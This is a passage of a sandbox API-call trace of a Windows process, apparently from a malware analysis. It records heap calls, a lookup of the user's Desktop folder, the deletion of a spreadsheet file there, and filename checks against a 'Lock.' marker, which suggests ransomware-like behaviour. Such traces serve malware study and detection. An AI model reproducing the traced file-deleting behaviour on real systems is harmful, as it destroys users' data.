hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.792] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.792] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.792] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.792] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.792] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.792] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.792] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.792] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.792] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.792] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.792] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.792] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.792] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0160.793] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0160.793] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.793] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0160.793] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.793] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.793] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.793] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.793] FreeLibrary (hLibModule=0x74d40000) returned 1 [0160.794] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.794] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.795] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.795] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.795] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0160.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0160.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/5EdvDyyb.xls", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5EdvDyyb.xls", lpFilePart=0x8bedfc*="5EdvDyyb.xls") returned 0x32 [0160.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0160.797] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5EdvDyyb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5edvdyyb.xls")) returned 0x20 [0160.797] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5EdvDyyb.xls", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c31f8d0, ftCreationTime.dwHighDateTime=0x1d4d345, ftLastAccessTime.dwLowDateTime=0xe41c40a0, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0xe41c40a0, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x19, dwReserved1=0x4, cFileName="5EdvDyyb.xls", cAlternateFileName="")) returned 0xaa55e0 [0160.797] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5EdvDyyb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5edvdyyb.xls")) returned 1 [0160.799] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c31f8d0, ftCreationTime.dwHighDateTime=0x1d4d345, ftLastAccessTime.dwLowDateTime=0xe41c40a0, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0xe41c40a0, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x19, dwReserved1=0x4, cFileName="5EdvDyyb.xls", cAlternateFileName="")) returned 0 [0160.799] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0160.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.799] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0160.800] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0160.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0160.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.800] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0160.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0160.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0160.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/5EdvDyyb.xls", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5EdvDyyb.xls", lpFilePart=0x8bf658*="5EdvDyyb.xls") returned 0x32 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0160.803] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5EdvDyyb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5edvdyyb.xls")) returned 0xffffffff [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.804] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0160.804] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.804] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0160.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6qT95vcU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qT95vcU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T95vcU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="95vcU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5vcU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vcU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cU.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0160.807] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0160.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 